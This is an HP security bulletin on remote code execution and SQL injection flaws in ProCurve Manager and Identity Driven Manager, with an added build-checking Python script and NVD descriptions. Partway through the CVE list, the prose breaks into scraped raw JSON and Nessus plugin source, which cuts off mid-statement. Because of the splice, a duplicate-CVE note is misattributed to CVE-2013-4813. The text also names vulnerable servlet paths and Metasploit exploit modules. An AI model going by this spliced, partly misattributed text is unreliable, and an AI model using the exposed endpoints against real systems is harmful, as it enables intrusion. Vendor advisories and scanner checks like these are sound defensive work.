-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03897409
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03897409
Version: 2
HPSBPV02918 rev.2 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven
Manager (IDM), SQL Injection, Remote Code Execution, Session Reuse
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2013-10-15
Last Updated: 2013-10-15
Potential Security Impact: SQL injection, remote code execution, session
reuse
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP ProCurve
Manager (PCM), HP PCM+ and HP Identity Driven Manager (IDM). These
vulnerabilities could be exploited remotely to allow SQL injection, remote
code execution and session reuse.
References: CVE-2005-2572 (SSRT101272)
CVE-2013-4809 (ZDI-CAN-1744, SSRT101132)
CVE-2013-4810 (ZDI-CAN-1760, SSRT101127)
CVE-2013-4811 (ZDI-CAN-1743, SSRT101116)
CVE-2013-4812 (ZDI-CAN-1742, SSRT101115)
CVE-2013-4813 (ZDI-CAN-1745, SSRT101129)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP ProCurve Manager (PCM) v3.x, v3.20, v4.0
HP PCM+ v3.20, v4.0
HP Identity Driven Manager (IDM) v4.0
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference       Base Vector                    Base Score
CVE-2013-4809   (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10
CVE-2013-4810   (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10
CVE-2013-4811   (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10
CVE-2013-4812   (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10
CVE-2013-4813   (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10
CVE-2005-2572   (AV:N/AC:M/Au:S/C:C/I:C/A:C)   8.5
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
The Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with
HP's Zero Day Initiative to report CVE-2013-4809, CVE-2013-4810,
CVE-2013-4811, CVE-2013-4812 and CVE-2013-4813 to security-alert@hp.com
RESOLUTION
HP has provided updated software to resolve these issues. Please use the
AutoUpdate feature of PCM to install it.
Note about CVE-2005-2572 and PCM v3.x: to address CVE-2005-2572 on PCM v3.x, a
separate security tool must be run. To obtain it, browse to the HP Networking
Support Lookup Tool at http://www.hp.com/networking/support and:
1. Enter a PCM v3.x product number, such as J9173A, J9174A, J9175A, or J9176A,
   into the "Auto Search" text box.
2. Check the appropriate product.
3. Press "Display Selected".
4. Click "Software Downloads".
5. In the "Other" section, download the "Security Tools" package, a zip file
   containing several executables.
To protect your PCM v3.x installation, run the pcm320-DB-restrict tool (32-bit
and 64-bit versions are provided). Read the release notes included in the
Security Tools download before running it.
IMPORTANT: if you will be upgrading a protected PCM v3 installation to PCM v4,
run the pcm320-DB-unrestrict utility before starting the upgrade.
Product and Potential Vulnerability / Resolution / HP Branded Products Impacted

HP IDM v4.00 (CVE-2013-4809, CVE-2013-4810, CVE-2013-4811, CVE-2013-4812)
  Resolution: HP PCM v4.00 AutoUpdate #6 04.00.06.628
  Products:   J9752A HP PCM+ Identity Driven Manager v4 Software Module with
              500-user License
              J9753A HP PCM+ Identity Driven Manager v4 Software Module with
              Unlimited-user License

HP PCM v3.20, HP PCM v4.00 (CVE-2013-4813)
  Resolution: HP PCM v4.00 AutoUpdate #5 04.00.05.612
              HP PCM v3.20 AutoUpdate #8 C.03.20.1741
  Products:   J9755A HP PCM+ v4 Software Platform with 50-device License
              J9757A HP PCM+ v4 Software Platform with Unlimited-device License
              J9173A HP ProCurve Manager Plus 3.0 50 device license upgrade
              J9174A HP ProCurve Manager Plus 3.0 software with 50 device license
              J9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade
              J9177A HP ProCurve Manager Plus 3.0 software with unlimited device
              license

HP PCM v4.00 (CVE-2005-2572)
  Resolution: HP PCM v4.00 AutoUpdate #5 04.00.05.612
  Products:   J9755A HP PCM+ v4 Software Platform with 50-device License
              J9757A HP PCM+ v4 Software Platform with Unlimited-device License

HP PCM v3.x (CVE-2005-2572)
  Resolution: no AutoUpdate build; run the pcm320-DB-restrict tool described in
              the Resolution text above
  Products:   J9173A HP ProCurve Manager Plus 3.0 50 device license upgrade
              J9174A HP ProCurve Manager Plus 3.0 software with 50 device license
              J9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade
              J9177A HP ProCurve Manager Plus 3.0 software with unlimited device
              license
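A build-number gate derived from the resolution table above, added here as an example; it is not HP code. It assumes that an install reports its build in the bulletin's own notation (04.00.06.628 on the v4.00 track, C.03.20.1741 on the v3.20 track) and that the sample inventory builds are constructed. It follows the table literally: on the v4.00 track AutoUpdate #5 closes CVE-2013-4813 and CVE-2005-2572 and AutoUpdate #6 closes the four IDM CVEs; on the v3.x track AutoUpdate #8 closes CVE-2013-4813, while CVE-2005-2572 is only closed by running pcm320-DB-restrict, which no build number can prove, so a v3.x install is never reported as fully patched by build alone.

```python
"""Gate HP PCM/IDM installs against the fixed builds in HPSBPV02918 rev.2.
Added example (not HP code). Assumes build strings use the bulletin's
notation, e.g. "04.00.06.628" (v4.00 track) or "C.03.20.1741" (v3.20 track).
"""
import re

# Fixed builds per track, copied from the bulletin's resolution table.
FIXED = {
    '4.00': (
        # PCM v4.00 AutoUpdate #5
        ('04.00.05.612', ('CVE-2013-4813', 'CVE-2005-2572')),
        # PCM v4.00 AutoUpdate #6 (IDM v4.00 module)
        ('04.00.06.628', ('CVE-2013-4809', 'CVE-2013-4810',
                          'CVE-2013-4811', 'CVE-2013-4812')),
    ),
    '3.x': (
        # PCM v3.20 AutoUpdate #8
        ('C.03.20.1741', ('CVE-2013-4813',)),
    ),
}

# Issues that no AutoUpdate build closes on a track: CVE-2005-2572 on PCM v3.x
# needs the separately downloaded pcm320-DB-restrict tool.
MANUAL = {'3.x': ('CVE-2005-2572',)}

_BUILD_RE = re.compile(r'^(?:[A-Z]\.)?(\d+(?:\.\d+)+)$')


def parse_build(build):
    """Turn '04.00.06.628' or 'C.03.20.1741' into a comparable int tuple.
    The optional leading letter (the 'C.' on the v3.20 track) is dropped."""
    m = _BUILD_RE.match(build.strip())
    if not m:
        raise ValueError(f'unrecognised PCM build string: {build!r}')
    return tuple(int(part) for part in m.group(1).split('.'))


def track_of(version):
    """Map a parsed build to the bulletin's product track by major version."""
    return {4: '4.00', 3: '3.x'}.get(version[0])


def assess(build):
    """Report which fixed builds an install is still below, and which issues
    need manual action regardless of build. Builds are compared only within
    their own track, since the two tracks use different numbering."""
    version = parse_build(build)
    track = track_of(version)
    report = {'build': build, 'track': track, 'outstanding': {}, 'manual': ()}
    if track is None:          # not a version covered by this bulletin
        return report
    for fixed, cves in FIXED[track]:
        if version < parse_build(fixed):
            report['outstanding'][fixed] = cves
    report['manual'] = MANUAL.get(track, ())
    return report


def patched_by_build(build):
    """True only when the build number alone proves every bulletin item is
    closed; a v3.x install can never satisfy this because of CVE-2005-2572."""
    report = assess(build)
    return (report['track'] is not None
            and not report['outstanding']
            and not report['manual'])


if __name__ == '__main__':
    # Constructed sample inventory (hypothetical hosts and builds).
    for host, build in (('pcm-a', '04.00.04.590'), ('pcm-b', '04.00.06.628'),
                        ('pcm-c', 'C.03.20.1700'), ('pcm-d', 'C.03.20.1741')):
        r = assess(build)
        status = 'OK' if patched_by_build(build) else (
            f"needs {sorted(r['outstanding'])} manual={list(r['manual'])}")
        print(host, build, status)
```

Feed it the build strings from your PCM inventory; any host on the v3.x track will always come back with CVE-2005-2572 under "manual", which is the reminder to confirm that pcm320-DB-restrict was actually run there.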
HISTORY
Version:1 (rev.1) - 9 September 2013 Initial release
Version:2 (rev.2) - 15 October 2013 Added PCM v3
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlJdvz4ACgkQ4B86/C0qfVmLhwCghN6a1Opqqcbd3dLqlnnfQWci
UR8AoIhyX+Ht4By5+4v503IdvTZKcaWg
=3nFW
-----END PGP SIGNATURE-----
RELATED PUBLIC REFERENCES
Cross-references collected on the index page this copy was taken from; they
are not part of the HP bulletin:
ZDI advisories: ZDI-13-225, ZDI-13-226, ZDI-13-227, ZDI-13-228, ZDI-13-229
Metasploit modules: exploit/windows/http/hp_pcm_snac_update_certificates,
  exploit/windows/http/hp_pcm_snac_update_domain
Packet Storm: 123255, 123256
Nessus plugins: jmxinvokerservlet_ejbinvokerservlet_rce.nasl,
  mysql_user_defined_functions_restrictions.nasl
OpenVAS: 1361412562310103811
CVE DESCRIPTIONS (NVD)
The NVD entries for the CVEs referenced above, as collected on the index page
this copy was taken from:

CVE-2005-2572 (CVSS 2.0: 8.5, AV:N/AC:M/Au:S/C:C/I:C/A:C): MySQL, when running
on Windows, allows remote authenticated users with insert privileges on the
mysql.func table to cause a denial of service (server hang) and possibly
execute arbitrary code via (1) a request for a non-library file, which causes
the Windows LoadLibraryEx function to block, or (2) a request for a function in
a library that has the XXX_deinit or XXX_init functions defined but is not
tailored for MySQL, such as jpeg1x32.dll and jpeg2x32.dll. On PCM v3.x the
bulletin's fix for this issue is the pcm320-DB-restrict database tool rather
than an application update.

CVE-2013-4809 (NVD CVSS 2.0: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P; HP's table above
rates it 10): Multiple SQL injection vulnerabilities in GetEventsServlet in HP
ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, and Identity Driven
Manager (IDM) 4.0 allow remote attackers to execute arbitrary SQL commands via
the (1) sort or (2) dir parameter.

CVE-2013-4810: HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0,
Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow
remote attackers to execute arbitrary code via a marshalled object to (1)
EJBInvokerServlet or (2) JMXInvokerServlet, aka ZDI-CAN-1760.

CVE-2013-4811 (CVSS 2.0: 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C):
UpdateDomainControllerServlet in the SNAC registration server in HP ProCurve
Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, and Identity Driven Manager
(IDM) 4.0 does not properly validate the adCert argument, which allows remote
attackers to upload .jsp files and consequently execute arbitrary code via
unspecified vectors, aka ZDI-CAN-1743.

CVE-2013-4812 (CVSS 2.0: 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C):
UpdateCertificatesServlet in the SNAC registration server in HP ProCurve
Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, and Identity Driven Manager
(IDM) 4.0 does not properly validate the fileName argument, which allows remote
attackers to upload .jsp files and consequently execute arbitrary code via
unspecified vectors, aka ZDI-CAN-1743. (The References list above maps
CVE-2013-4812 to ZDI-CAN-1742.)

CVE-2013-4813 (CVSS 2.0: 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C): The Agent (aka
AgentController) servlet in HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20
and 4.0, and Identity Driven Manager (IDM) 4.0 allows remote attackers to
execute arbitrary commands via a HEAD request, aka ZDI-CAN-1745.
NOTE: this is probably a duplicate of CVE-2007-1036, CVE-2010-0738, and/or CVE-2012-0874.", "cvss3": {}, "published": "2013-09-16T13:01:00", "type": "cve", "title": "CVE-2013-4810", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1036", "CVE-2010-0738", "CVE-2012-0874", "CVE-2013-4810"], "modified": "2017-10-05T01:29:00", "cpe": ["cpe:/a:hp:application_lifecycle_management:-", "cpe:/a:hp:identity_driven_manager:4.0", "cpe:/a:hp:procurve_manager:4.0", "cpe:/a:hp:procurve_manager:3.20"], "id": "CVE-2013-4810", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4810", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:identity_driven_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:application_lifecycle_management:-:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-08-19T12:59:22", "description": "User-defined functions in MySQL can allow a database user to cause binary libraries on the host to be loaded. The insert privilege on the table 'mysql.func' is required for a user to create user-defined functions. 
When running on Windows and possibly other operating systems, MySQL is potentially affected by the following vulnerabilities:\n\n - If an invalid library is requested the Windows function 'LoadLibraryEx' will block processing until an error dialog box is acknowledged on the server.\n It is not likely that non-Windows systems are affected by this particular issue.\n\n - MySQL requires that user-defined libraries contain functions with names fitting the formats: 'XXX_deinit' or 'XXX_init'. However, other libraries are known to contain functions fitting these formats and, when called upon, can cause application crashes, memory corruption and stack pollution.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-18T00:00:00", "type": "nessus", "title": "MySQL User-Defined Functions Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2572"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:mysql:mysql"], "id": "MYSQL_USER_DEFINED_FUNCTIONS_RESTRICTIONS.NASL", "href": "https://www.tenable.com/plugins/nessus/17698", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(17698);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\"CVE-2005-2572\");\n script_bugtraq_id(62358);\n\n script_name(english:\"MySQL User-Defined Functions Multiple Vulnerabilities\");\n script_summary(english:\"Checks for MySQL.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is potentially affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"User-defined functions in MySQL can allow a database user to cause\nbinary libraries on the host to be loaded. The insert privilege on\nthe table 'mysql.func' is required for a user to create user-defined\nfunctions. 
When running on Windows and possibly other operating\nsystems, MySQL is potentially affected by the following\nvulnerabilities:\n\n - If an invalid library is requested the Windows\n function 'LoadLibraryEx' will block processing until\n an error dialog box is acknowledged on the server.\n It is not likely that non-Windows systems are affected\n by this particular issue.\n\n - MySQL requires that user-defined libraries contain\n functions with names fitting the formats: 'XXX_deinit'\n or 'XXX_init'. However, other libraries are known to \n contain functions fitting these formats and, when called\n upon, can cause application crashes, memory corruption\n and stack pollution.\");\n\n script_set_attribute(attribute:\"solution\", value:\n\"There is currently no known fix or patch to address these issues. \nInstead, make sure access to create user-defined functions is\nrestricted.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2005/Aug/199\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:mysql\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Databases\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_require_keys(\"Settings/PCI_DSS\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"mysql_func.inc\");\n\n# Only PCI considers this an issue.\nif (!get_kb_item(\"Settings/PCI_DSS\")) exit(0, \"PCI-DSS compliance checking is not enabled.\");\n\nport = get_service(svc:\"mysql\", default:3306, exit_on_fail:TRUE);\n\nif (mysql_init(port:port) >= 0)\n{\n # Try to get variant and version\n variant = mysql_get_variant();\n version = mysql_get_version();\n}\nelse exit(0, \"The service on port \"+port+\" does not look like MySQL.\");\n\n# All versions are vulnerable.\nif (report_verbosity > 0)\n{\n if (!isnull(variant) && !isnull(version))\n {\n report =\n '\\n Variant : ' + variant +\n '\\n Installed version : ' + version +\n '\\n';\n datadir = get_kb_item('mysql/' + port + '/datadir');\n if (!empty_or_null(datadir))\n {\n report += ' Data Dir : ' + datadir + '\\n';\n }\n databases = get_kb_item('mysql/' + port + '/databases');\n if (!empty_or_null(databases))\n { \n report += ' Databases :\\n' + databases;\n }\n }\n else\n {\n report = \n '\\nNessus was able to determine a MySQL server is listening on' +\n '\\nthe remote host but unable to determine its version and / or' +\n '\\nvariant.' +\n '\\n';\n }\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\nmysql_close();\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:50:28", "description": "User-defined functions in MySQL can allow a database user to load binary libraries. The insert privilege on the table '/mysql.func' is required for a user to create user-defined functions. 
It was confirmed that MySQL on the Windows platform (and possibly other platforms, though unverified) is potentially impacted by the following vulnerabilities:\n\n - If an invalid library is requested the Windows function 'LoadLibraryEx' will block processing until an error dialog box is acknowledged on the server. It is not likely that non-Windows systems are affected by this particular issue.\n\n - MySQL requires that user-defined libraries contain functions with names fitting the formats: 'XXX_deinit' or 'XXX_init'. However, other libraries are known to contain functions fitting these formats and, when called upon, can cause application crashes, memory corruption and stack pollution.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-04-24T00:00:00", "type": "nessus", "title": "MySQL User Defined Function Detected", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2572"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:*"], "id": "8218.PRM", "href": "https://www.tenable.com/plugins/nnm/8218", "sourceData": "Binary data 8218.prm", "cvss": {"score": 8.5, "vector": "CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:16:23", "description": "The 'EBJInvokerServlet' and 'JMXInvokerServlet' servlets hosted on the web server on the remote host are accessible to unauthenticated users. The remote host is, therefore, affected by the following vulnerabilities :\n\n - A security bypass vulnerability exists due to improper restriction of access to the console and web management interfaces. An unauthenticated, remote attacker can exploit this, via direct requests, to bypass authentication and gain administrative access.\n (CVE-2007-1036)\n\n - A remote code execution vulnerability exists due to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets not properly restricting access to profiles. 
An unauthenticated, remote attacker can exploit this to bypass authentication and invoke MBean methods, resulting in the execution of arbitrary code.\n (CVE-2012-0874)\n\n - A remote code execution vulnerability exists in the EJBInvokerServlet and JMXInvokerServlet servlets due to the ability to post a marshalled object. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to install arbitrary applications. Note that this issue is known to affect McAfee Web Reporter versions prior to or equal to version 5.2.1 as well as Symantec Workspace Streaming version 7.5.0.493 and possibly earlier.\n (CVE-2013-4810)", "cvss3": {"score": null, "vector": null}, "published": "2013-10-14T00:00:00", "type": "nessus", "title": "Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1036", "CVE-2012-0874", "CVE-2013-4810"], "modified": "2022-03-28T00:00:00", "cpe": ["cpe:/a:hp:procurve_manager", "cpe:/a:hp:application_lifecycle_management", "cpe:/a:hp:identity_driven_manager", "cpe:/a:redhat:jboss_enterprise_web_platform", "cpe:/a:redhat:jboss_enterprise_application_platform", "cpe:/a:redhat:jboss_enterprise_brms_platform", "cpe:/a:redhat:jboss_enterprise_application_platform", "cpe:/a:jboss:jboss_application_server", "cpe:/a:symantec:workspace_streaming"], "id": "JMXINVOKERSERVLET_EJBINVOKERSERVLET_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/70414", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70414);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\"CVE-2007-1036\", \"CVE-2012-0874\", \"CVE-2013-4810\");\n script_bugtraq_id(57552, 62854, 77037);\n script_xref(name:\"CERT\", value:\"632656\");\n 
script_xref(name:\"EDB-ID\", value:\"16318\");\n script_xref(name:\"EDB-ID\", value:\"21080\");\n script_xref(name:\"EDB-ID\", value:\"28713\");\n script_xref(name:\"EDB-ID\", value:\"30211\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-229\");\n script_xref(name:\"HP\", value:\"HPSBGN02952\");\n script_xref(name:\"HP\", value:\"SSRT101127\");\n script_xref(name:\"HP\", value:\"emr_na-c04041110\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The 'EBJInvokerServlet' and 'JMXInvokerServlet' servlets hosted on\nthe web server on the remote host are accessible to unauthenticated\nusers. The remote host is, therefore, affected by the following\nvulnerabilities :\n\n - A security bypass vulnerability exists due to improper\n restriction of access to the console and web management\n interfaces. An unauthenticated, remote attacker can\n exploit this, via direct requests, to bypass\n authentication and gain administrative access.\n (CVE-2007-1036)\n\n - A remote code execution vulnerability exists due to the\n JMXInvokerHAServlet and EJBInvokerHAServlet invoker\n servlets not properly restricting access to profiles. An\n unauthenticated, remote attacker can exploit this to\n bypass authentication and invoke MBean methods,\n resulting in the execution of arbitrary code.\n (CVE-2012-0874)\n\n - A remote code execution vulnerability exists in the\n EJBInvokerServlet and JMXInvokerServlet servlets due to\n the ability to post a marshalled object. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted request, to install arbitrary\n applications. 
Note that this issue is known to affect\n McAfee Web Reporter versions prior to or equal to\n version 5.2.1 as well as Symantec Workspace Streaming\n version 7.5.0.493 and possibly earlier.\n (CVE-2013-4810)\");\n # https://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74979c27\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-229/\");\n # https://web.archive.org/web/20131031213751/http://retrogod.altervista.org/9sg_ejb.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?52567bc1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Oct/126\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/530241/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Dec/att-133/ESA-2013-094.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using EMC Data Protection Advisor, either upgrade to version 6.x or\napply the workaround for 5.x. 
\n\nOtherwise, contact the vendor or remove any affected JBoss servlets.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4810\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'JBoss JMX Console Deployer Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-13-606\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:procurve_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:application_lifecycle_management\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:identity_driven_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_web_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_application_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_brms_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_application_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:jboss:jboss_application_server\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:workspace_streaming\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 9111, 8080, 9832);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n# Identify possible ports.\n#\n# - web servers.\nports = get_kb_list(\"Services/www\");\nif (isnull(ports)) ports = make_list();\n\n# - ports for McAfee Web Reporter and Symantec Workspace Streaming.\nforeach p (make_list(8080, 9111, 9832))\n{\n if (service_is_unknown(port:p)) ports = add_port_in_list(list:ports, port:p);\n}\n\n# Check each port.\nnon_vuln = make_list();\n\nforeach port (ports)\n{\n vuln_urls = make_list();\n\n foreach page (make_list(\"/EJBInvokerServlet\", \"/JMXInvokerServlet\"))\n {\n url = \"/invoker\" + page;\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n fetch404 : TRUE\n );\n\n if (\n !isnull(res) &&\n \"org.jboss.invocation.MarshalledValue\" >< res[2] &&\n (\n 'WWW-Authenticate: Basic realm=\"JBoss HTTP Invoker\"' >!< res[1] ||\n \"404 Not Found\" >!< res[1]\n )\n ) vuln_urls = make_list(vuln_urls, build_url(qs:url, port:port));\n }\n\n if (max_index(vuln_urls) > 0)\n {\n if (max_index(vuln_urls) > 1) request = \"URLs\";\n else request = \"URL\";\n\n if (report_verbosity > 0)\n {\n report =\n '\\n' +'Nessus was able to verify the issue exists using the following '+\n '\\n' + request + ' :' +\n '\\n' +\n '\\n' + join(vuln_urls, sep:'\\n') + '\\n';\n\n security_hole(port:port, extra:report);\n }\n else 